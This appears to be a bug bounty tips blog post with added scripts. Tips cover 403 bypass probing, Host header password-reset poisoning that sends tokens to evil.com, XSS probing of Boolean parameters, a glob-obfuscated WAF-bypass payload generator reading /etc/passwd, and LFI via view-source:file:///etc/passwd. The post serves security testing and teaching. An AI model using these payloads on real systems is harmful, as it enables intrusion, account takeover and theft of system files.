It’s time for another dose of bug bounty tips from the bug hunting community on Twitter, sharing their knowledge for all of us to help us find more vulnerabilities and collect bug bounties.
This is the 9th part and in each part we are publishing 10 or more tips. Let’s start!
- 1. Bypass 403 errors by traversing deeper
- 2. Prevent accidental copy & paste errors in terminal
- 3. Full-featured JavaScript recon automation (JSFScan.sh)
- 4. List of 25 tools for detecting XSS
- 5. Password poisoning bypass to account takeover
- 6. Useful regex for subdomain level extraction
- 7. Find XSS in Java applications in Boolean values
- 8. WAF bypass using globbing
- 9. Scan Jira for known CVEs and misconfigurations
- 10. Calculate favicon hash value for favicon recon
- 11. Browser-based application LFI via view-source
- 12. OneListForAll – “Rockyou” wordlist for web fuzzing
- 13. List of 9 tools for identifying sensitive information
- Conclusion
1. Bypass 403 errors by traversing deeper
If the “/.git” directory returns 403 Forbidden, try a file that is known to live inside it, such as “/.git/config” or “/.git/HEAD”. Chances are that it will be accessible.
This is because a forbidden directory doesn’t necessarily mean that access to the files and subdirectories below it is forbidden as well. Often only the directory listing is disabled (e.g. Apache’s Options -Indexes answers 403 for the directory itself) or a deny rule matches the directory path exactly, while the individual files are still served. Keep this in mind while bug hunting.
Protip: Check also related tips BBT8-11, BBT6-6, BBT4-5 and BBT4-6 for bypassing 403 Forbidden and 401 Unauthorized errors.
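As an added example (not part of the original tip), here is a small probe that does the traversal automatically: for a directory that answered 403 it requests the files that normally live inside it and reports the ones that come back with something other than 401/403/404. The list of well-known files, the target URL and the User-Agent are assumptions for illustration; only the standard library is used.

```python
"""Probe files inside a directory that answered 403 Forbidden."""
import ssl
import urllib.error
import urllib.request

# Files that normally exist inside directories which are frequently blocked
# only at the directory level. Assumed list for the example; extend as needed.
SUBPATHS = {
    "/.git": ["config", "HEAD", "index", "logs/HEAD", "refs/heads/master"],
    "/.svn": ["entries", "wc.db"],
    "/admin": ["index.php", "login", "config.php"],
}


def candidate_paths(forbidden_dir):
    """Concrete file paths to try for a directory that returned 403."""
    base = "/" + forbidden_dir.strip("/")
    return [f"{base}/{p}" for p in SUBPATHS.get(base, [])]


def looks_like_git_config(first_bytes):
    """A real .git/config starts with an INI section such as [core]; a soft
    200 (custom error page, catch-all route) does not."""
    return b"[core]" in first_bytes


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Keep 30x responses as they are; a redirect is not an accessible file."""

    def redirect_request(self, *args, **kwargs):
        return None


def status_of(url, timeout=10):
    """Return (status_code, first 200 bytes) for a GET of url."""
    opener = urllib.request.build_opener(
        NoRedirect, urllib.request.HTTPSHandler(context=ssl.create_default_context()))
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.read(200)
    except urllib.error.HTTPError as e:
        return e.code, e.read(200)


def traverse_deeper(base_url, forbidden_dir):
    """Probe each candidate and return the ones that were not denied."""
    hits = []
    for path in candidate_paths(forbidden_dir):
        code, head = status_of(base_url.rstrip("/") + path)
        if code not in (401, 403, 404):
            hits.append((path, code, head))
    return hits


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "https://target.example"  # assumed host
    for path, code, head in traverse_deeper(target, "/.git"):
        flag = " (real git config)" if looks_like_git_config(head) else ""
        print(code, path + flag)
```

Run it as `python3 probe.py https://target.example`. The `looks_like_git_config` check matters because many targets answer 200 with an HTML error page for any path; a hit is only interesting when the body is the artifact you expected.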
2. Prevent accidental copy & paste errors in terminal
The following tip prevents commands from being executed unintentionally when you accidentally paste multi-line text into your terminal window. It relies on readline’s bracketed paste mode, which is available in bash 4.4 and newer (bash 5.1 turns it on by default).
Simply add this to your ~/.inputrc file:
set enable-bracketed-paste
Or just run this one-liner to add it and reload the file in the current shell:
echo "set enable-bracketed-paste" >> ~/.inputrc && bind -f ~/.inputrc
Now if you accidentally paste multi-line text into your terminal, it is inserted into the current line as a single chunk and is NOT executed until you press Enter, so you can review or discard it. This saves you from a potential disaster, or at least from littering your shell history with garbage. Note that this setting is for readline-based shells such as bash; zsh has bracketed paste enabled by default since version 5.1.
3. Full-featured JavaScript recon automation (JSFScan.sh)
By @KathanP19 (via @nil0x42)
Source: link
There’s a new cool project in town for a comprehensive JavaScript analysis called JSFScan.sh. It has the following features:
- Gather JSFile links from different sources
- Import files containing JSUrls
- Extract endpoints from JSFiles
- Find secrets stored in JSFiles
- Store JSFiles locally for manual analysis
- Make a wordlist from JSFiles
- Extract variable names from JSFiles for possible XSS
- Scan JSFiles for DOM-based XSS
Here’s how to use it:
bash JSFScan.sh -l targets.txt -e -s -m -o outdir
Make sure that targets.txt contains one URL per line, each prefixed with the http:// or https:// scheme, for a smooth operation.
Results from the tool will be displayed on the console and also stored in the specified output folder along with the collected artifacts.
JSFScan.sh internally uses the following tools to identify and examine the JavaScript files that it finds during analysis:
- Interlace
- SecretFinder
- Waybackurls
- Gau
- SubJS
- Httpx
- JSBeautify
- JSVar.sh
- FinDomXSS.sh
- Hakrawler
- LinkFinder
- GetJsWords.py
It is therefore a very comprehensive tool. The installation script takes care of these dependencies, which makes it straightforward to set up and use.
4. List of 25 tools for detecting XSS
Here is a compilation of 25 web application security and pentesting tools that can help with discovering XSS (Cross-Site Scripting) vulnerabilities:
- XSSer – Cross Site “Scripter” is an automatic framework to detect, exploit and report XSS vulnerabilities in web-based applications
- W3af – Web application attack and audit framework capable of finding many different vulnerabilities, not just XSS
- Probely – Commercial website vulnerability scanner with many advanced features and integrations
- Powerfuzzer – Highly automated and fully customizable web fuzzer based on many other open-source fuzzers
- Burp Suite – World leading web application security scanner and toolkit for penetration testers and bug hunters
- Netsparker – Commercial fully integrated, scalable and automated web application security solution
- ZAProxy – OWASP Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications
- WebScarab – OWASP WebScarab is a bit dated web application security framework and intercepting proxy tool, but definitely still very usable today
- XSStrike – Advanced XSS detection suite equipped with four hand written parsers, an intelligent payload generator, a powerful fuzzing engine and an incredibly fast crawler
- XSScrapy – Fast, thorough, XSS and SQLi spider. Give it a URL and it will test every link it finds for cross-site scripting and SQL injections
- Wfuzz – Powerful web application security fuzzing tool and library for Python capable of finding many different vulnerabilities and misconfigurations
- ImmuniWeb On-Demand – Web application penetration testing service based on AI technology delivering tailored remediation guidelines and zero false-positives
- Nmap – NSE scripts for detecting XSS: (1) http-xssed, (2) http-stored-xss, (3) http-phpself-xss, (4) http-dombased-xss, (5) http-unsafe-output-escaping
- JMeter – Software mainly for load and stress testing which can also be used as a fuzzer for web application security testing to find XSS and SQLi vulnerabilities
- Wapiti – Web-application vulnerability scanner capable of identifying many different security vulnerabilities, not only XSS
- ZAP-CLI – Command line tool that wraps the OWASP ZAP API for controlling ZAP and executing quick, targeted attacks
- Arachni – Feature-rich, modular, high-performance and multi-platform web application security scanning and testing framework
- XSS Hunter – Highly specialized online service for identifying different kinds of XSS vulnerabilities, including blind XSS, with advanced features such as screenshotting etc.
- Firebug – Discontinued Firefox extension for live debugging, editing, and monitoring of any website’s CSS, HTML, DOM, XHR, and JavaScript engines
- XSSsniper – An automatic XSS discovery tool with mass scanning functionalities
- Skipfish – High-speed web application security reconnaissance tool and vulnerability scanner
- KNOXSS – Online XSS PoC (Proof of Concept) tool that allows you to find and prove XSS flaws
- Acunetix – Commercial web application security scanner and network vulnerability scanner with many advanced features
- Psalm – Free and open-source static analysis tool for identifying security problems in PHP applications with many advanced features and plugins for various PHP frameworks
- Dalfox – Parameter analysis and XSS scanning tool written in Golang with many advanced features
Do you have some other favorite tool for XSS? Please share in the comment section!
5. Password poisoning bypass to account takeover
By @Debian_Hunter
Source: link
This bug bounty tip demonstrates a bypass technique for password reset functionality which can potentially result in ATO (account takeover).
Consider the following 3 requests:
(1) Normal request:
- Request:
POST /password-reset?user=123 HTTP/1.1
Host: target.com
- Link received:
https://target.com/reset-link=1g2f3guy23g
(2) Basic HHI (Host Header Injection):
- Request:
POST /password-reset?user=123 HTTP/1.1
Host: evil.com
- Link received:
none (Error 404 – request blocked)
(3) Bypass technique:
- Request:
POST https://target.com/password-reset?user=123 HTTP/1.1
Host: evil.com
- Link received:
https://evil.com/reset-link=1g2f3guy23g
Notice that in the bypass we have used an absolute URL as the request target of the POST request. In that case the Host header should be ignored (RFC 7230 says that when the request-target is in absolute form, the host comes from the request-target itself). The front-end component (reverse proxy, router or host validation) follows this rule and lets the request through because the absolute URL points at target.com, but some back-end systems still read the raw Host header when they build the reset link. That inconsistency is what leaks the token.
If successful, this can lead to high severity bugs causing reset token leakage and consequently account takeover and privilege escalation. Here is a real bug report describing the impact nicely in detail.
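To make the inconsistency concrete, here is an added example (not code from the original tip or from any real application) that replays the three requests above against a simulated front-end and two simulated back-ends: one that builds the link from the Host header and one that uses a configured canonical host. The hostnames are the ones from the tip; the token, the ALLOWED_HOSTS set and the CANONICAL_HOST value are assumptions for the example.

```python
"""Absolute-form request-target vs. Host header: front-end/back-end mismatch."""
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"target.com"}     # hosts the front-end agrees to serve (assumed)
CANONICAL_HOST = "target.com"      # host the fixed back-end puts into e-mails (assumed)


def parse_request(raw):
    """Split a raw HTTP/1.1 request head into (method, request_target, headers)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line:
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def effective_host(target, headers):
    """RFC 7230 rule: with an absolute-form request-target the host is taken
    from the target and the Host header is ignored; otherwise Host is used."""
    if target.startswith(("http://", "https://")):
        return urlsplit(target).netloc.lower()
    return headers.get("host", "").lower()


def front_end_accepts(target, headers):
    """Front-end that derives the host correctly and checks it against an allowlist."""
    return effective_host(target, headers) in ALLOWED_HOSTS


def backend_link_vulnerable(target, headers, token):
    """Back-end that builds the reset link from the raw Host header."""
    return f"https://{headers.get('host', '')}/reset-link={token}"


def backend_link_fixed(target, headers, token):
    """Back-end that never derives the link host from the request at all."""
    return f"https://{CANONICAL_HOST}/reset-link={token}"


def password_reset(raw_request, token, backend):
    """Return the link that would be e-mailed, or None if the front-end blocks."""
    method, target, headers = parse_request(raw_request)
    if method != "POST" or not front_end_accepts(target, headers):
        return None
    return backend(target, headers, token)


TOKEN = "1g2f3guy23g"  # placeholder token from the tip, not a real one
NORMAL = "POST /password-reset?user=123 HTTP/1.1\r\nHost: target.com\r\n\r\n"
BASIC_HHI = "POST /password-reset?user=123 HTTP/1.1\r\nHost: evil.com\r\n\r\n"
BYPASS = ("POST https://target.com/password-reset?user=123 HTTP/1.1\r\n"
          "Host: evil.com\r\n\r\n")

if __name__ == "__main__":
    for name, req in (("normal", NORMAL), ("basic HHI", BASIC_HHI), ("bypass", BYPASS)):
        print(f"{name:10} vulnerable back-end -> {password_reset(req, TOKEN, backend_link_vulnerable)}")
        print(f"{name:10} fixed back-end      -> {password_reset(req, TOKEN, backend_link_fixed)}")
```

The fix is not “validate Host better”: it is to stop deriving security-relevant URLs from request headers at all and use a configured canonical host, which is what `backend_link_fixed` does.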
6. Useful regex for subdomain level extraction
By @imranparray101
Source: link
Deeper subdomains (4th level and beyond, e.g. dev.api.internal.example.com) are often older or less maintained and therefore tend to be more vulnerable than the well-trodden 2nd and 3rd level hosts. Here is a tip on how to grep for a specific level of subdomains from a list of subdomains:
cat subdomains.txt | grep -P '^(?:[a-z0-9]+\.){MIN,MAX}[^.]*$'
Note that the character class [a-z0-9] does not allow hyphens or upper-case letters, so names such as my-api.example.com are silently dropped; use [a-z0-9-]+ (or add -i) if your list contains them. The pattern also simply counts labels, so example.co.uk is a 3rd level name by this measure.
The following table shows what values to provide in the regex in order to match the desired domain levels:
| Regex pattern | Domain level match |
|---|---|
| grep -P '^(?:[a-z0-9]+\.){1}[^.]*$' | 2nd level domains only |
| grep -P '^(?:[a-z0-9]+\.){2}[^.]*$' | 3rd level domains only |
| grep -P '^(?:[a-z0-9]+\.){2,}[^.]*$' | 3rd level domains or higher |
| grep -P '^(?:[a-z0-9]+\.){2,3}[^.]*$' | 3rd to 4th level domains only |
| grep -P '^(?:[a-z0-9]+\.){3,}[^.]*$' | 4th level domains or higher |
Here’s an example of matching only 4th level domains from a list of subdomains:
cat subdomains.txt | grep -P '^(?:[a-z0-9]+\.){3}[^.]*$'
This could be useful for prioritizing the work during bug hunting or pentesting when having a large list of targets.
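The same level filter in Python, as an added example that is not part of the original tip: it builds the regex from the wanted minimum and maximum level like the table above, but with a label pattern that also accepts hyphens and mixed case, so hostnames such as my-api.example.com are not lost. The sample hostnames are constructed.

```python
"""Filter a list of hostnames by subdomain level (number of labels)."""
import re

# One DNS label: letters/digits, hyphens allowed inside, no underscores.
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?"


def level(name):
    """Number of labels: example.com -> 2, dev.internal.example.com -> 4."""
    return len(name.strip().rstrip(".").split("."))


def level_pattern(min_levels, max_levels=None):
    """Regex matching hostnames with min..max labels (max None = unbounded).
    Mirrors the grep table: {N} trailing 'label.' groups plus one final label."""
    n = min_levels - 1
    quant = f"{{{n},}}" if max_levels is None else f"{{{n},{max_levels - 1}}}"
    return re.compile(rf"^(?:{LABEL}\.){quant}{LABEL}$")


def filter_levels(names, min_levels, max_levels=None):
    """Keep the names whose level is within [min_levels, max_levels]."""
    pat = level_pattern(min_levels, max_levels)
    return [n for n in names if pat.match(n.strip())]


# Constructed sample list standing in for subdomains.txt.
SAMPLE = [
    "example.com",
    "www.example.com",
    "my-api.example.com",
    "dev.internal.example.com",
    "a.b.c.example.com",
    "bad_label.example.com",
]

if __name__ == "__main__":
    for lo, hi in ((2, 2), (3, 3), (3, None), (4, 4), (4, None)):
        print(f"levels {lo}..{hi or 'inf'}:", filter_levels(SAMPLE, lo, hi))
```

`bad_label.example.com` is dropped at every level because underscores are not valid in hostnames; if your recon output contains service records such as `_dmarc.example.com`, widen LABEL accordingly.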
7. Find XSS in Java applications in Boolean values
By @ShawarkOFFICIAL
Source: link
If a Java-based website is fully protected against XSS attacks, look for parameters having Boolean values (true / false), e.g. Sales=true, configure=false etc.
Most Java web frameworks bind request parameters to typed properties, converting [java.lang.String] to [java.lang.Boolean] and raising an error if the value cannot be converted. The message below is the one produced by Spring’s data binder.
If such a parameter is replaced with an XSS payload, the conversion fails and the resulting exception message embeds the offending value verbatim. When the error page prints that message without HTML-encoding it, the payload is returned unfiltered:
Failed to convert property value of type [java.lang.String] to required type [java.lang.Boolean] for property 'vulnerableParameter'; nested exception is java.lang.IllegalArgumentException: Invalid boolean value [woot3<xss>]
An example screenshot:
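As an added example (not from the original tip), the following script finds the Boolean parameters in a URL, replaces each of them with a marker and classifies the response: the marker reflected verbatim inside a type-conversion error is the interesting case, the marker reflected HTML-encoded is not. The response bodies used for the offline check are constructed; the request helper uses urllib and is only run when you pass a real URL.

```python
"""Probe Boolean parameters for unencoded reflection in a conversion error."""
import html
import re
import urllib.error
import urllib.parse
import urllib.request

MARKER = "woot3<xss>"  # harmless marker; '<' and '>' survive only if unencoded
CONVERSION_ERROR = re.compile(
    r"Failed to convert property value of type \[java\.lang\.String\] "
    r"to required type \[java\.lang\.Boolean\]"
)


def classify(body, marker=MARKER):
    """'raw'       marker appears unencoded inside a conversion error message
       'reflected' marker appears unencoded somewhere else
       'encoded'   marker appears only HTML-escaped
       'none'      marker not reflected at all"""
    if marker in body:
        return "raw" if CONVERSION_ERROR.search(body) else "reflected"
    if html.escape(marker) in body:
        return "encoded"
    return "none"


def boolean_params(query):
    """Names of query parameters whose current value is true/false."""
    return [k for k, v in urllib.parse.parse_qsl(query) if v.lower() in ("true", "false")]


def fetch(url, timeout=10):
    """GET url and return the body as text, for both 2xx and error responses."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as r:
            return r.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.read().decode("utf-8", "replace")


def probe(url, marker=MARKER):
    """Replace each Boolean parameter in turn and classify the response."""
    parts = urllib.parse.urlsplit(url)
    pairs = urllib.parse.parse_qsl(parts.query)
    results = {}
    for name in boolean_params(parts.query):
        q = [(k, marker if k == name else v) for k, v in pairs]
        test_url = urllib.parse.urlunsplit(parts._replace(query=urllib.parse.urlencode(q)))
        results[name] = classify(fetch(test_url), marker)
    return results


# Constructed response body in the shape of the Spring error from the tip.
SAMPLE_ERROR_BODY = (
    "Failed to convert property value of type [java.lang.String] to required type "
    "[java.lang.Boolean] for property 'Sales'; nested exception is "
    "java.lang.IllegalArgumentException: Invalid boolean value [woot3<xss>]"
)

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print(probe(sys.argv[1]))   # e.g. https://target.example/?Sales=true&configure=false
    else:
        print(classify(SAMPLE_ERROR_BODY))
```

A `raw` result only tells you the value is echoed unencoded; confirm the Content-Type is HTML (and not text/plain or JSON) before you call it XSS.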
8. WAF bypass using globbing
By @rizasabuncu
Source: link
If there is a WAF (Web Application Firewall) blocking your RCE (Remote Code Execution) and LFI (Local File Inclusion) payloads on keywords such as cat or /etc/passwd, you can try to bypass it with globbing.
Here’s an example; both sides run the same command:
/usr/bin/cat /etc/passwd == /???/???/c?t$IFS/?t?/p?s?wd
Globbing (pathname expansion) is the shell’s pattern matching of file paths. It uses the following wildcards, neither of which matches the / path separator, so every path component has to be matched on its own:
- ? = any single character
- * = any string, including the zero length string!
Globbing is performed by the shell, so this bypass only works when your input reaches a shell, e.g. through system(), popen(), sh -c or backticks; exec-style calls that pass an argv array directly do not expand wildcards. Windows has filename wildcards as well, but there they are expanded by the individual program or cmdlet rather than by cmd.exe, so the following trick is specific to POSIX shells. On those we can also use the $IFS special variable to substitute whitespace:
- $IFS = Internal Field Separator = [space], [tab] and [newline] by default
For instance, all of these should execute “/bin/cat /etc/passwd” on a typical Linux system:
/*/?at$IFS/???/???swd
/****/?at$IFS/???/*swd
/****/?at$IFS/???/*******swd
Keep the patterns as narrow as you can: the shell expands a glob to every path it matches, so an ambiguous pattern adds extra words to the command line (/???/???/c?t also matches /usr/bin/cut on most Linux systems, so cat would be fed that binary as well), and a pattern that matches nothing is left as is unless nullglob is set, which makes the command fail.
Try it!
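An added example (not from the original tip) that automates the choice of pattern: for every WAF-blocked keyword in a path it tries the least wildcarded variants first and keeps the first one that no longer contains the keyword and still expands to exactly one path. The blocklist and the file listing that stands in for the target’s filesystem are constructed; fnmatch plays the role of the shell’s pathname expansion (with the difference that fnmatch’s * may cross /, which the patterns here never rely on).

```python
"""Build glob-obfuscated paths that avoid WAF keywords and still resolve uniquely."""
import fnmatch


def candidate_masks(word):
    """Masked variants of a blocked word, fewest wildcards first:
    cat -> ?at, c?t, ca?, then the alternating mask, then all wildcards."""
    n = len(word)
    for i in range(n):
        yield word[:i] + "?" + word[i + 1:]
    yield "".join("?" if i % 2 and i != n - 1 else ch for i, ch in enumerate(word))
    yield "?" * n


def glob_matches(pattern, listing):
    """Every path in listing that the pattern expands to (shell semantics)."""
    return [p for p in listing if fnmatch.fnmatchcase(p, pattern)]


def mask_path(path, word, listing):
    """Least-wildcarded pattern that no longer contains `word` and expands to
    exactly `path`, or None if every variant is ambiguous on this filesystem."""
    if word not in path:
        return path
    for cand in candidate_masks(word):
        pattern = path.replace(word, cand)
        if word in pattern:
            continue
        if glob_matches(pattern, listing) == [path]:
            return pattern
    return None


def build_payload(argv, blocked, listing):
    """Mask every blocked word in every argument; join with $IFS instead of spaces."""
    parts = []
    for arg in argv:
        for word in blocked:
            arg = mask_path(arg, word, listing)
            if arg is None:
                return None
        parts.append(arg)
    return "$IFS".join(parts)


# Constructed listing standing in for the target's filesystem.
LISTING = ["/usr/bin/cat", "/usr/bin/cut", "/usr/bin/chmod", "/etc/passwd", "/etc/group"]
BLOCKED = ["cat", "passwd"]  # assumed WAF keyword blocklist

if __name__ == "__main__":
    print(build_payload(["/usr/bin/cat", "/etc/passwd"], BLOCKED, LISTING))
    print("ambiguous:", glob_matches("/???/???/c?t", LISTING))
```

On the constructed listing this yields `/usr/bin/?at$IFS/etc/?asswd`, and `glob_matches` shows why the tip’s own `/???/???/c?t` is noisy on a real box: it expands to both cat and cut. In the field you do not have the listing, so verify the expansion with a harmless command (e.g. `echo /???/???/c?t`) before using it.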
9. Scan Jira for known CVEs and misconfigurations
Have you found a target running Jira? Here is how you can check for several known CVEs and misconfigurations in one go using a nuclei workflow:
echo http://jira.targetsite.com | nuclei -t workflows/jira-exploitaiton-workflow.yaml
Nice and easy wins.
To see which checks are performed, have a look at the actual Jira workflow here:
Note that there are workflows for many other applications, not just for Jira, and you can easily write and add your own checks as well.
Protip: Make sure to update your templates every now and then. Here’s how easy it is:
nuclei -update-templates
That’s it!
Get nuclei here:
10. Calculate favicon hash value for favicon recon
By @kalimer0x00 (via @intigriti)
Source: link
Here’s a useful command to calculate hash of a favicon on an arbitrary URL:
curl -s -L -k https://gitlab.com/favicon.ico | python3 -c 'import mmh3,sys,codecs; print(mmh3.hash(codecs.encode(sys.stdin.buffer.read(),"base64")))'
Note that you have to install the mmh3 python package for the above command to work:
pip3 install mmh3
The details matter here: the hash is MurmurHash3 (32-bit, signed) computed over the base64 text of the favicon, line-wrapped every 76 characters exactly as codecs.encode(…, "base64") emits it. Hashing the raw bytes, or base64 without the newlines, gives a different number that will not match anything. After obtaining the favicon hash value, we can look it up e.g. using the Shodan search engine and discover other web sites with the same favicon:
shodan search http.favicon.hash:1278323681
Could be handy indeed!
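As an added example (not part of the original tip), here is the same hash computed without the mmh3 package: a pure-Python MurmurHash3 x86_32, which is the function mmh3.hash() wraps, applied to the newline-wrapped base64 text. The empty-input and four-zero-bytes values are the published MurmurHash3 test vectors; the favicon bytes in the usage section are constructed.

```python
"""Shodan-style favicon hash: MurmurHash3 x86_32 over newline-wrapped base64."""
import codecs
import struct


def murmur3_32(data, seed=0):
    """MurmurHash3 x86_32; returns the signed 32-bit value like mmh3.hash()."""
    c1, c2, mask = 0xCC9E2D51, 0x1B873593, 0xFFFFFFFF

    def rotl(x, r):
        return ((x << r) | (x >> (32 - r))) & mask

    h = seed & mask
    nblocks = len(data) // 4
    # Body: 4-byte little-endian blocks.
    for k in struct.unpack("<%dI" % nblocks, data[:nblocks * 4]):
        k = rotl((k * c1) & mask, 15)
        k = (k * c2) & mask
        h ^= k
        h = rotl(h, 13)
        h = (h * 5 + 0xE6546B64) & mask
    # Tail: the remaining 0..3 bytes.
    tail = data[nblocks * 4:]
    k = 0
    if len(tail) >= 3:
        k ^= tail[2] << 16
    if len(tail) >= 2:
        k ^= tail[1] << 8
    if len(tail) >= 1:
        k ^= tail[0]
        k = rotl((k * c1) & mask, 15)
        k = (k * c2) & mask
        h ^= k
    # Finalisation mix.
    h ^= len(data)
    h ^= h >> 16
    h = (h * 0x85EBCA6B) & mask
    h ^= h >> 13
    h = (h * 0xC2B2AE35) & mask
    h ^= h >> 16
    return h - 0x100000000 if h & 0x80000000 else h


def favicon_hash(favicon_bytes):
    """Hash the base64 text with a newline every 76 chars, as Shodan does."""
    return murmur3_32(codecs.encode(favicon_bytes, "base64"))


if __name__ == "__main__":
    # Constructed stand-in for a favicon; replace with the bytes fetched via curl.
    fake_favicon = bytes(range(256)) * 4
    print(favicon_hash(fake_favicon))
    print("shodan query: http.favicon.hash:%d" % favicon_hash(fake_favicon))
```

Feed it a real file with `favicon_hash(open("favicon.ico", "rb").read())`; the value is identical to the one the curl/mmh3 one-liner prints, so it drops straight into `shodan search http.favicon.hash:…`.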
Protip: Check also these previously published tips related to favicons:
- BBT2-6 – Find Spring Boot servers with Shodan
- BBT3-3 – Find related domains via favicon hash
- BBT8-8 – Database of 500 Favicon hashes (FavFreak)
11. Browser-based application LFI via view-source
By @HusseiN98D
Source: link
This bug bounty tip is useful for web applications that use a headless browser on the server side to render a URL you give them, for instance an advertisement preview or a link validation function.
It could also be a web app that takes your URL and screenshots it for you. In short, anywhere a URL you control is rendered by a browser on the server side.
Alright, now the actual tip:
Naturally as a bug hunter, you are going to try to access “file:///etc/passwd”, right? But what if it is blacklisted or somehow blocked? Try accessing “view-source:file:///etc/passwd” instead!
The “view-source” feature is often forgotten by developers in blacklists.
12. OneListForAll – “Rockyou” wordlist for web fuzzing
OneListForAll is a giant wordlist for web endpoint fuzzing compiled from some of the best wordlists currently available, lowercased and deduplicated, ready to be used for bug hunting!
The current release v1.0 contains more than 10.3M entries.
It is recommended to be used with the ffuf web fuzzer, like this:
ffuf -c -mc all -ac -w onelistforall.txt -u https://target.com/FUZZ
With 10.3M entries it will take a while, so respect the program’s rate limits (ffuf’s -rate option caps requests per second), but the results should be worth it!
Get the latest wordlist from here:
13. List of 9 tools for identifying sensitive information
By @payloadartist
Source: link
Here’s a compiled list of 9 tools for identifying secrets, API keys, access tokens and similar sensitive data:
- SecretFinder – Python script for finding sensitive data (API keys, access tokens, authorizations, JWTs, ..) in JavaScript files
- BurpSuite-Secret_Finder – The above project as a Burp Suite extension for finding sensitive data, processing every HTTP response passing through Burp
- TruffleHog – Searches through Git repositories for high entropy strings and secrets, digging deep into commit history
- Rusty Hog – Suite of secret scanners to detect sensitive information such as API keys, passwords, personal information etc. Based on TruffleHog.
- GitHound – Reconnaissance tool for GitHub code search. Finds exposed API keys using pattern matching, commit history searching and a unique scoring system
- Gitrob – Reconnaissance tool for GitHub repositories with many advanced features and a web interface which is very convenient
- ShhGit – Finds committed secrets and sensitive files across GitHub, Gists, GitLab and BitBucket or your local repositories in real time
- Git-all-secrets – Tool to capture all the Git secrets by leveraging multiple open source Git searching tools
- Leakin – Detects secrets based on regular expressions, containing over 770 patterns with ability to process any file or even scan a folder
With these tools no buried secret should remain a secret any longer!
Conclusion
That’s it for this part of the bug bounty tips.
Massive thanks to all the authors for sharing their tools and tips:
- @vict0ni
- @nil0x42
- @KathanP19
- @cry__pto
- @Debian_Hunter
- @imranparray101
- @ShawarkOFFICIAL
- @rizasabuncu
- @pdnuclei
- @kalimer0x00
- @intigriti
- @HusseiN98D
- @Six2dez1
- @payloadartist
Make sure to follow them on Twitter, they will help you stay on top of the bug bounty game!